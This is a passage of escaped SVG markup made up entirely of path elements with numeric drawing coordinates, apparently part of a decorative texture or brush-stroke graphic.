d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path 